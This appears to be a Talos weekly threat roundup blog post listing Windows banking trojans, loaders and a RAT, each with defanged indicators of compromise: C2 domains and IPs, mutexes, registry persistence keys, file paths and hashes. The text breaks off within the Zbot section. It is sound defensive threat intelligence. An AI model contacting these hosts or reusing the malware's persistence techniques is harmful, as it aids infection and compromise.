Today, Talos is publishing a glimpse into the most prevalent threats we've observed between May 14 and May 21. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat NameTypeDescription
Win.Malware.TrickBot-9861087-1 Malware TrickBot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts.
Win.Packed.Dridex-9861097-1 Packed Dridex is a well-known banking trojan that aims to steal credentials and other sensitive information from an infected machine.
Win.Malware.BazarLoader-9861103-1 Malware BazarLoader is used to drop follow-on malware on an infected system, most commonly the Trickbot banking trojan or Ryuk ransomware. BazarLoader is named in part because its C2 communications typically occur to domain names using the .bazar top-level domain.
Win.Malware.Nymaim-9861140-1 Malware Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential C2 domains to connect to additional payloads.
Win.Packed.Zbot-9861143-0 Packed Zbot, also known as Zeus, is a trojan that steals information such as banking credentials, using methods including key-logging and form-grabbing.
Win.Downloader.Banload-9861199-0 Downloader Banload is a banking trojan believed to be developed by Brazilian cybercriminals and is used primarily to infect machines in Latin America. One notable aspect of Banload is it's use of custom kernel-drivers to evade detection.
Win.Packed.Tofsee-9861724-1 Packed Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages to infect additional systems and increase the size of the botnet.
Win.Packed.Razy-9862528-0 Packed Razy is oftentimes a generic detection name for a Windows trojan. It collects sensitive information from the infected host and encrypts the data, eventually sending it to a command and control (C2) server. Information collected may include screenshots. The samples modify auto-execute functionality by setting and creating a value in the registry for persistence.
Win.Malware.Zegost-9861320-1 Malware Zegost is a remote access trojan designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. Zegost appears to be derived from Gh0stRAT, which is a well-known remote access trojan that had its source code leaked, thus significantly lowering the barrier to entry for actors looking to modify and reuse the code in new attacks.

Threat Breakdown

Win.Malware.TrickBot-9861087-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
MutexesOccurrences
316D1C7871E00 23
738EBAFEEBF832960 1
BFD454C45310128 1
FE987D7EF5F832960 1
AD793940E5000 1
90B218BE62F832960 1
FFB9185061400 1
1F87A966A59832960 1
953EF270C9C00 1
49621BFE6FF832960 1
42C2F870E1C00 1
FF7AE18086000 1
1393994E653832960 1
0E48F9F2E7C832832 1
9909A2888A200 1
9E13052C14B0128 1
D3BAACFEB3F832960 1
5314CA12284832832 1
B4F41EC07B000 1
CF01200A802832832 1
BBEA15D45750128 1
87014DD6375832960 1
D9028B982E600 1
9BD9819006400 1
E32439AAE6A832832 1

*See JSON for more IOCs

IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
34[.]117[.]59[.]81 6
194[.]87[.]92[.]147 6
116[.]203[.]16[.]95 5
95[.]217[.]228[.]176 5
104[.]22[.]18[.]188 4
149[.]154[.]68[.]252 4
62[.]109[.]6[.]188 3
94[.]250[.]250[.]112 3
62[.]109[.]2[.]172 3
95[.]213[.]237[.]223 3
82[.]146[.]61[.]187 2
92[.]63[.]97[.]68 2
87[.]236[.]16[.]231 2
23[.]21[.]48[.]44 2
172[.]67[.]9[.]138 2
23[.]96[.]30[.]229 2
92[.]53[.]78[.]74 2
194[.]87[.]101[.]9 2
194[.]87[.]94[.]108 2
92[.]53[.]77[.]44 2
92[.]53[.]78[.]71 2
89[.]67[.]149[.]48 2
92[.]53[.]66[.]151 2
194[.]87[.]101[.]6/31 2
216[.]239[.]32[.]21 1

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
icanhazip[.]com 6
wtfismyip[.]com 5
ip[.]anysrc[.]net 5
checkip[.]amazonaws[.]com 4
elb097307-934924932[.]us-east-1[.]elb[.]amazonaws[.]com 4
api[.]ipify[.]org 4
ipinfo[.]io 2
checkip[.]us-east-1[.]prod[.]check-ip[.]aws[.]a2z[.]com 2
myexternalip[.]com 2
npf-orbis[.]ru 2
ipecho[.]net 1
Files and or directories createdOccurrences
%APPDATA%\services\client_id 25
%APPDATA%\SERVICES\<original file name>.exe 25
%System32%\Tasks\services update 23
%APPDATA%\services\Modules 23
%APPDATA%\services\group_tag 23
%APPDATA%\services 23
%APPDATA%\services\0aa3bead95550842076a37g064a7e87247g09e3775767d5978d7a75778607266.exe 1
%APPDATA%\services\06g296736ff2a472fd70777gf757edd53788dg8ae23a66feee7a9d6247f69aab.exe 1
%APPDATA%\services\2482ed84bge76a7a73f64090b408be4bbbe3g8d8f56e0fb36ad5fdf86eff700d.exe 1
%APPDATA%\services\44b6255bd52737780fe9f73f5555257707g333776b87d4e57ff074g598087gef.exe 1
%APPDATA%\services\4277b8b9a4ef794e80b289fbd9763a002d0879790d77gb06eab5g87a7de9bg45.exe 1
%APPDATA%\services\6ed6970eddbd7a45b9e8e38d7f486250ba0e225453fd2bb84775g8e9374ag4b8.exe 1
%APPDATA%\services\7ed783g7g7g2465b6b683885bd77523772b0gdegd2ea93g84a5a45d70a8de590.exe 1
%APPDATA%\services\a6b73f686gf7g820d3904e7ee096de277eb6d6g8af3ge2579gb64e5d7g662995.exe 1
%APPDATA%\services\28e2387gb866680d969de7202932470ee76f972ad92dd47f595ef6309ea236g0.exe 1
%APPDATA%\services\5840532ag77707a5762a3098e99e2d30258498g3f5dbee3724620f97b8567b73.exe 1
%APPDATA%\services\242aa9agg35e6a7d3e70a07ad9eb7ee3eb54054a6efe263b85ee629686f375e4.exe 1
%APPDATA%\services\78e8bd6774829g2790976ae468687767f9f7bb7g3a27b64bg4254bb02da7f776.exe 1
%APPDATA%\services\aagb0365568b440776e0bd9944062f5f32666587377fg0349592696db3ag0de6.exe 1
%APPDATA%\services\ae5868d7735f5db874gddf2a86b653f60479b846g37dd877ebbfdag54f30696a.exe 1
%APPDATA%\services\a2da0eg24f279e5470735g47g7a7762d56da9gb557ff55gbe0g9f3383g4f7daa.exe 1
%APPDATA%\services\4e2089fe07gaf45df77e724938g325def7420a8e5a394f6a278a5g93daab7826.exe 1
%APPDATA%\services\be3748edgg6gdf98e7a68f5d6ae23b88484a335e7ba769d29abdff9g04gg568d.exe 1
%APPDATA%\services\0dd75f85ba576a26gb37df38g86633ge99d2g299fda292595aabfg4a04f6g7ed.exe 1
%APPDATA%\services\252de9g288g0950ab3g855f25g32594f942244a5847af3224bb4f0ade8b5a52f.exe 1

*See JSON for more IOCs

File Hashes

05f195725ee1a361ec60766fe747dcc42688cf8ad12a55eddd7a9c5136e59aab
0aa2bdac94440831075a26f053a7d87137f09d2774656c4968c7a74668506155
0cc74e84ba475a15fb27ce28f85522fd99c1f199eca191494aabef3a03e5f7dc
11d68417576c62a2a2b29ede70e41fee3a3ee193cf2ba8aff263cf9ba55c03e1
131aa9aff24d5a6c2d70a07ac9db7dd2db43043a5ded152b84dd519585e274d3
1381dc83bfd65a6a62e53090b308bd3bbbd2f8c8e45d0eb25ac4ece85dee700c
141cd9f188f0940ab2f844e14f21493e931133a4836ae2113bb3e0acd8b4a41e
18d1287fb855580c959cd7101921360dd65e971ac91cc36e494de5209da125f0
1bcaef0d86d3fc9eef239fd55f9c9b17630c881426c38afc59af281694bbf3e7
3166b8b9a3de793d80b189ebc9652a001c0879690c77fb05dab4f86a6cd9bf34
31bb9e87a0bb8fa3d72da620bb6805037fbba7a3e38e74e032239b83d890961b
33b5144bc41727680ed9e62e4444147607f222765b86c3d47ee073f498087fde
3d1089ed07fae34ce76d713928f214cde6310a8d4a293e5a168a4f92caab6815
4830421af66606a4751a2098d99d1c20148398f2e4cbdd2713510e96b8457b62
5dc5970dccbc6a34b9d8d28c6e385140ba0d114342ec1bb83664f8d9273af3b8
68d8bc5673819f1790975ad358586657e9e7bb6f2a17b53bf3143bb01ca6e675
69b8841de597bbf5b579d673279d5c4273e7cb85a5d574e9dd3b95b6bf94e542
6dc782f7f6f1354b5b582884bc77412771b0fcdfc1da92f83a4a34c60a8cd490
83b0a05523df193ae83adb18353afb513ff52b53cfc1f520fedadf1db6f8035d
9ab87de15c4d5c8d8be7a217e72b215fc92b0fcedc0971147c373a6aa2456fef
a1ca0df13e169d4370724f37f7a7651c45ca9fb447ee44fbd0f9e2282f3e7caa
a5b62e585fe7f810c2903d7dd095cd166db5c5f8ae2fd1479fb53d4c7f551994
aafb0254458b330765d0bc9933051e4e21555487276ef0239491595cb2af0cd5
ad4858c6624e4cb863fcce1a85b542e50369b835f27cc877dbbecaf43e20595a
bd2638dcff5fce98d7a58e4c5ad12b88383a224d6ba659c19abcee9f03ff458c

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.Dridex-9861097-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 15 samples
Registry KeysOccurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: trkcore
15
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableTaskMgr
15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0
Value Name: CheckSetting
15
MutexesOccurrences
<random, matching [A-Z0-9]{10}> 15
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
172[.]217[.]12[.]142 15
104[.]23[.]99[.]190 9
172[.]217[.]197[.]113 6
104[.]23[.]98[.]190 6
23[.]3[.]13[.]88 6
172[.]217[.]197[.]100/31 6
172[.]217[.]197[.]138/31 4
72[.]21[.]81[.]240 3
172[.]217[.]197[.]102 3
173[.]194[.]207[.]113 2
173[.]194[.]175[.]94 2
173[.]194[.]207[.]94 2
209[.]85[.]201[.]94 2
209[.]85[.]144[.]104/31 2
205[.]185[.]216[.]42 1
172[.]217[.]197[.]132 1
209[.]85[.]201[.]101 1
8[.]249[.]233[.]254 1
209[.]85[.]201[.]113 1
173[.]194[.]207[.]84 1
23[.]21[.]48[.]44 1
173[.]194[.]135[.]102 1
92[.]53[.]78[.]74 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
pastebin[.]com 15
w[.]google[.]com 15
www3[.]l[.]google[.]com 15
cs11[.]wpc[.]v0cdn[.]net 3
www[.]tf6hb6lgxp[.]com 1
www[.]2rj2le7eup[.]com 1
www[.]rtcolspuut[.]com 1
www[.]bzc5wf2n9s[.]com 1
www[.]zjxtx6gcdz[.]com 1
www[.]i0a22eufx0[.]com 1
www[.]3yfxpn5aoa[.]com 1
www[.]mqlhvoj9cr[.]com 1
www[.]aw0curgluw[.]com 1
www[.]piwsarbgqj[.]com 1
www[.]trvy6jf3vp[.]com 1
www[.]gi2nl0uepw[.]com 1
www[.]lzch7hv9aa[.]com 1
www[.]dvkehx8niy[.]com 1
www[.]dqdihx9ddf[.]com 1
www[.]rvuxzg4tcf[.]com 1
www[.]9mc82bxk1z[.]com 1
www[.]gjbofjdyny[.]com 1
www[.]aj1xfcn7qr[.]com 1
www[.]kvzvvm56x7[.]com 1
www[.]u4wn6yp6pb[.]com 1

*See JSON for more IOCs

Files and or directories createdOccurrences
<malware cwd>\old_<malware exe name> (copy) 15
\Temp\HncDownload\Update.log 1
%ProgramData%\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\LockScreen___1024_0768_notdimmed.jpg (copy) 1
%ProgramData%\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\~ockScreen___1024_0768_notdimmed.tmp 1
%LOCALAPPDATA%\Microsoft\CLR_v2.0_32\UsageLogs\HncCheck.exe.log 1
%LOCALAPPDATA%\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl 1

File Hashes

004ed482c5833663b462f2e58c0688c7ffd78a6a338bdb077c71fdb828d7e12a
13a3b51e4012da6bb2a5a62b85c69cec81dc6dc50830bb4ff4216717c2041e23
2b5c62e7f804eb82808105c7203f26aec0f58e94db8ca4a7c575998fded5d560
2df959c9c17b548ae48657e028c19626f875d095d2fbc73852bb16c436b7dc35
2e520da78e72564d7a44252d58fc3df0add1d2271b9df3134ffca7806247887a
49befa3ce7b9f67cd29131e4da155e7d2e937f7f6f675ec96228b65881073a6a
4e3838ab1c8199a5b242d1f08231ae4ababe69dab1c54c49dd7e7c3da37fd53f
517449257fbdf8e331d3c7023b7700a411cb573603086c5b3fe331a0f1581cfe
67f0b9b34c03bee7e5eeac2eba0201af3ce37bff2a6d539536e6013c0a8310be
9562c05766567b8ace11e1543f1e31444c9110615ea3ed9882bc8526ce749af1
bf1e5bccf528ed852f6814e21841c7e3d431badd8b6ed6c2f9690f45a7ab5683
c571a219c4024dafd6e2db63262edaff393e7f6559ea90b91f0730a4e8741c0f
c7295ae189b94b5388eb657009e99b1272aff78efb2fcc688a86e80aafa1ae7c
ccd951eec041a9addf5cbde4d7953918a7961298574e011365afc4e861d0302b
d941fdd39e9b41db64073cd94c32e222cc6633a112524282043897ccb74f3a45

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Malware.BazarLoader-9861103-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Skyре
13
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Skyре Remote Control
3
MutexesOccurrences
2020_ld_id_20_07 18
2020_child_id_20_07 18
Global\19e2efa1-b35f-11eb-b5f8-00501e3ae7b6 1
Global\c2face21-b40c-11eb-b5f8-00501e3ae7b6 1
Global\43743321-b467-11eb-b5f8-00501e3ae7b6 1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
94[.]247[.]43[.]254 16
172[.]98[.]193[.]42 16
116[.]203[.]98[.]109 16
194[.]36[.]144[.]87 16
165[.]22[.]224[.]164 16
34[.]221[.]188[.]35 16
172[.]98[.]193[.]62 16
45[.]76[.]254[.]23 16
198[.]50[.]135[.]212 16
195[.]123[.]240[.]6 14
78[.]108[.]216[.]13 14
220[.]32[.]32[.]128 14
194[.]5[.]249[.]163 14
80[.]82[.]68[.]132 14
62[.]108[.]35[.]215 14
31[.]214[.]240[.]203 14
72[.]21[.]81[.]240 5
172[.]104[.]136[.]243 2
91[.]217[.]137[.]37 2
163[.]53[.]248[.]170 2
104[.]37[.]195[.]178 2
31[.]171[.]251[.]118 2
45[.]71[.]112[.]70 2
163[.]172[.]185[.]51 2
92[.]222[.]97[.]145 2

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
api[.]opennicproject[.]org 16
lstalker2game[.]bazaar 16
lrusstalker2game[.]bazaar 16
lbesthlalyxgame[.]bazaar 15
thegame[.]bazar 15
255[.]255[.]2[.]49 14
lbesthl3alyxgame[.]bazaar 14
lrusalyxbestgame[.]bazaar 10
api[.]opennic[.]org 9
lbeststalkergame[.]bazar 9
lbeststalkergame[.]bazaar 7
lstalker2game[.]bazar 7
lrusstalker2game[.]bazar 6
cs11[.]wpc[.]v0cdn[.]net 5
lbesthlalyxgame[.]bazar 5
lbesthl3alyxgame[.]bazar 3
lrusalyxbestgame[.]bazar 2
auto[.]au[.]download[.]windowsupdate[.]com[.]c[.]footprint[.]net 1
defiildlhiio[.]bazar 1
aeehjkalghjn[.]bazar 1
eeehjlelghjo[.]bazar 1
afeijlamgijo[.]bazar 1
cfgiimcmiiip[.]bazar 1
Files and or directories createdOccurrences
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Windows Control Panel.lnk 18

File Hashes

0615fc83f0a4a9abcf7b8285393d2903caf7925cd17d13e9a2f5864159e05e06
1010df3a366d64585c663d980edce786c19c94f20d912a72e05f2e060b17e482
2014e44bbaff8abefaa0f6a251c9810cd77e3f109f6ec9f4d121a6dfc3fe462c
231fd44326052d67dbbd79505ee5ed4a9130ba21b65c716fc7005027ea661dfc
25f32f90267585144c1e6e02867d2f72eb0e486e338755d9e6ccee3d72b446f1
3f7aa85550b112941e3e20b4dfb54fd1773d906bf5650a8107e49bdf731e3da6
4989dd9933ef037b19e95056874e752eca54291a1bcde157009a0e3d25597672
61bcf8fe872b4a560ca0781191615328f3482f52076c7b7b0e8f6103e9b7eb0e
6a500001a199b63d3e1c91603437de2d4c5e955d02df4299952f4182caef58a5
70c85fe73ad6060e5c20219911f2ce470daa646c302cea3a1bbd1278dc505e25
743f51ed08338910f2cd162c8c3b34eb42abbebea8c33502de36b8589779901b
7955aaca8bb62eeb5e36a17da77db7e3c9c77d3087f9a6607062523700e7ef83
8203a7b1dda88e2a4d0ac7c7ac6759515ed4d93f577c10b638e8a1878f05676c
84c3cc9c6b87138eaabeac5c2c51e2e890a17ec709f12a84a2bb765e552af84e
863f65a20c08c5aa58ef0dc5d1fda40f7885edb52e8516fb5a5d73966fc3d9bc
903c71bd86fa2699cb116a4228254ed7cecd6d23d1882038aa2c3c9764ca8240
90e716b63e960cf4b0aa27a2a84e28ddae1d6be369d0999c26a83a7391b81e8b
9566adced6b79a20beb1833f098c01e6117070a91559517118be515e3f5e0bea
9b20cb8130624aa9a02c8624b94f08f1fa1699b9b84ba7befe1c60ff85e4a829
a472dccc31ae682ed3a8d1f4f8254994fbaa7e81ce31ac61178b934499140a01
ab1da24b1b72dd8aa01b1cf67a071cbf9946dd5277dc7efe97aec43c7be61997
b4c28387b8574222f312657db88eaa1f2ee7f460821f717b92bd8ad1823c2684
ca3527076105e4a267b01cac3703265fe8e65a9d14b4fcacb24a73e9d9d9cba8
d488214860d46b5c97a199a352a2332f1f410f451c49bea55050744fe1a6082e
d78f119bb411796d40d74b6109260ed07fd496662bc28a7deff0a58b8ecba96c

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Malware.Nymaim-9861140-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\GOCFK 25
<HKCU>\SOFTWARE\MICROSOFT\KPQL 25
<HKCU>\SOFTWARE\MICROSOFT\GOCFK
Value Name: mbijg
25
<HKCU>\SOFTWARE\MICROSOFT\KPQL
Value Name: efp
25
MutexesOccurrences
Local\{180BBEAD-0447-044A-68BD-247EB6D0E352} 25
Local\{18DD7903-1E96-FEAF-92BF-014008A1248C} 25
Local\{8B75523D-CAF4-D06B-A2AD-13EEF593AC52} 25
Local\{D2CC4CCA-CB77-CF10-8293-17C78DEC853F} 25
Local\{B13D69F8-F0AA-A818-5093-74D6601607EE} 25
Local\{364979D3-CCFF-AEC0-03C9-4C6906B10346} 25
Local\{03D09EE6-3557-A6E4-5B03-5D5396702DDB} 25
Local\{43F69760-02CF-44A1-F90D-A342560A0D9F} 25
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
mjcvb[.]in 25
vnhpqbkwgh[.]com 25
zrhniegwylrs[.]pw 25
kqlxsala[.]in 25
rdvtg[.]com 25
lnntjxfqxh[.]net 25
caezvdor[.]in 25
lfxkysr[.]pw 25
rtgddpedtts[.]pw 25
knqblbzpx[.]com 25
fwmpxkwb[.]in 25
grszyndf[.]com 25
ivguyoatfkv[.]net 25
xmhicesjip[.]pw 25
vnkeculmkee[.]net 25
wgbvouu[.]net 25
yizbwryt[.]in 25
ixrdcv[.]net 25
ovcqyq[.]pw 25
janoglhwa[.]net 25
plndtmb[.]in 25
gctdhul[.]com 25
tyszy[.]net 25
uhawkmyyqufa[.]pw 25
ckaambwsv[.]com 25

*See JSON for more IOCs

Files and or directories createdOccurrences
%ProgramData%\ph 25
%ProgramData%\ph\eqdw.dbc 25
%ProgramData%\ph\fktiipx.ftf 25
%TEMP%\gocf.ksv 25
%TEMP%\kpqlnn.iuy 25

File Hashes

04ee8e1477707e4a89a26c2e6d3e666a376991fbdc2d4b91ee23748d718409b5
0f5d38c78a7e076b71dd4dc638246ff379870d4dd1ca2cf1901206142eb17a19
102ae22bd9873dfa304a851b29a0d23ada7134216ae970fa91241f3185ae0f13
12e87ec19462eccb40fd9f302a880158bad117bf8de1d879f72af0d43276d5d1
161f5d271f422089b3157e810da89aec7af7342984bae8d3946aaf84998073b2
1942a66e4d1ee8ef82747715f6be8d90508e2055e5f2d13b0277fd8177025157
1ee175c87de46075d08c8222aca2814b60096e6c8aff431d0e77dae31f4cf1f7
2a9ea7dc9a3af5ba258fd8000150f1f4be02a0e051c89f2c984c1da6a0e9bbea
36ea672db90a6687539744aeb2e2235266251d9b85f6bc73cb1e1ff6f23535b3
3701ae7b2f8dd6e0b012c369439734b895fdd53534718a226929b957728374fe
3c33c6f582c2cb89f06818a654d6768b1146b91f729f239fb9ae8c37fd3931a5
3dab3bcd66fccc39ba78c202ad6d8f25ac8d2cf81e077b6467e7332d8e8e9a95
4b4b5f9b72f956726dfc18d7fcc98a8441b2089a0e465b42f4f8ad12f167b23f
4e4554a081601900eef39a5f29a54f792cc6c0520099c927d213b5ec7ef14be3
505b184f1785ebe21d1ffd33422405ec0e5a2df2f41ddda25d0af8958bb1bda3
547ef2b56fd1564b6dec8b1212295e29d963986efcdec09a16ed99218057872a
5c22e440e2f0fdba49d0b62e942e082a89092c57f3ef613ac91d296364180afa
5d2f538c27bd4778ad86d94d2ee509aed9663ebaffa56158836047fb8efb79a8
64900df157a4cd4eb7f64956caa9f975cbe7615b7d1edad28d6e88ed7689db5a
661f317e6760525e3797320f789c91717b777c0ca80dae4c2cceec518ea9a0dd
6ccde75dc6c867bfb92cf2055a9d942540006382f69504fec60225c5f3f95afc
79af100c65d8819ba93cd18183d39f29907079c86114d0cd5d68cda6f3b84b63
7fa094e5efe49f4c20659d69e9126a3dece94b65227648bb1191d5c32fc224bb
801a68ca9867f2ad90f3c28dabc2ea313eabad149250d2deb7072002f5617cb9
8137703107aecbeb705fe4eeabcd390f2baf58819777b8c48355844a50dfefb1

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.Zbot-9861143-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101
Value Name: CheckSetting
4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103
Value Name: CheckSetting
4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100
Value Name: CheckSetting
4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102
Value Name: CheckSetting
4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104
Value Name: CheckSetting
4
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\PRIVACY
Value Name: CleanCookies
3
<HKCU>\SOFTWARE\WINRAR 3
<HKCU>\SOFTWARE\WINRAR
Value Name: HWID
3
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003E9
Value Name: F
3
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000001F5
Value Name: F
3
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\5F3B8CF2F810B37D78B4CEEC1919C37334B9C774
Value Name: Blob
2
<HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\5158F64FC7C749103980F85FAAC40EE22BCA870B 2
<HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\5158F64FC7C749103980F85FAAC40EE22BCA870B
Value Name: Blob
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ruslobofludo
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION
Value Name: AppManagement
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION
Value Name: ruslobofludozap
2
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003EC
Value Name: F
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 1
<HKCU>\SOFTWARE\MICROSOFT\NAYP 1
\RUN 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: 36412
1
<HKCU>\SOFTWARE\MICROSOFT\BATACA 1
<HKCU>\SOFTWARE\MICROSOFT\COXAY 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Negiwey
1
<HKCU>\SOFTWARE\MICROSOFT\BATACA
Value Name: Giub
1
MutexesOccurrences
GLOBAL\{<random GUID>} 4
Local\{<random GUID>} 4
ruslobofludo 2
2562100796 1
lol 1
1349173324 1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
184[.]168[.]131[.]241 3
198[.]185[.]159[.]144/31 2
198[.]49[.]23[.]144/31 2
157[.]7[.]184[.]19 2
103[.]18[.]109[.]167 2
210[.]140[.]168[.]57 2
51[.]178[.]156[.]9 2
49[.]212[.]235[.]209 2
149[.]56[.]111[.]2 2
91[.]136[.]8[.]130 2
35[.]177[.]71[.]77 2
91[.]210[.]232[.]251 2
121[.]122[.]15[.]234 2
204[.]213[.]246[.]21 2
175[.]207[.]13[.]31 2
79[.]99[.]167[.]43 2
85[.]214[.]146[.]173 2
169[.]62[.]11[.]219 2
207[.]55[.]98[.]4 2
183[.]181[.]98[.]115 2
185[.]68[.]110[.]198 2
217[.]115[.]118[.]56 2
89[.]161[.]181[.]123 2
148[.]81[.]111[.]98 2
34[.]72[.]197[.]182 2

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
ans-service[.]com 2
ginalimo[.]com 2
trenpalau[.]com 2
aipi[.]co[.]nz 2
cbsprinting[.]com[.]au 2
coop[.]nl 2
youjoomla[.]com 2
saios[.]net 2
acicinvestor[.]ca 2
www[.]e-storming[.]com 2
victoria[.]com[.]pl 2
thesergery[.]com 2
meprot[.]com 2
macgregor[.]co[.]kr 2
urayasu[.]net 2
ulcndsu[.]org 2
cath4choice[.]org 2
midwestga[.]com 2
hifuken[.]com 2
fleshercorp[.]com 2
norakuroya[.]com 2
csmbc[.]org 2
genmar[.]gen[.]tr 2
minatech[.]net 2
nori-k[.]com 2

*See JSON for more IOCs

Files and or directories createdOccurrences
%TEMP%\tmp<random, matching '[0-9a-z]{8}'>.bat 4
%APPDATA%\<random, matching '[a-z0-9]{3,7}'> 4
%APPDATA%\<random, matching '[A-Z][a-z]{3,5}\[a-z]{4,6}'>.exe 4
%HOMEPATH%\ruslobofludo.exe 2
%ProgramData%\Local Settings 1
%ProgramData%\Local Settings\Temp 1
%APPDATA%\tor\hidden_service 1
%APPDATA%\tor\hidden_service\hostname.tmp 1
%APPDATA%\tor\hidden_service\private_key.tmp 1
%APPDATA%\tor\lock 1
%APPDATA%\tor\state.tmp 1
%ProgramData%\Local Settings\Temp\mstaox.com 1
%APPDATA%\Boydax\reecu.yma 1
%APPDATA%\Etadig\axrir.onb 1
%APPDATA%\Henet\inaw.afd 1
%APPDATA%\Ylze\biuf.kam 1
%TEMP%\1249091494.bat 1
%APPDATA%\Rouq\keimm.ahq 1
%APPDATA%\Nyahgu\idyv.esl 1
%TEMP%\1249011699.bat 1
